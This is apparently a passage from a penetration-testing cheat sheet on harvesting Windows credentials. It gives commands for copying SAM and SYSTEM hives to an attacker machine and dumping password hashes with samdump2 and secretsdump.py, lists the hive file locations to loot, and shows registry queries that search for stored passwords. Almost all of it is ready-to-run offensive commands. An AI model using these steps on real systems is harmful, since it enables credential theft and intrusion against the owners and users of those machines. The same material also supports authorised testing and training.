# transfer to attacker machine then run
samdump2 -o output.txt System SAM Secret,
# or also
secretsdump.py -sam SAM -security Security -system System
Looting for Passwords in Windows:
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Searching the Registry for Passwords:
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K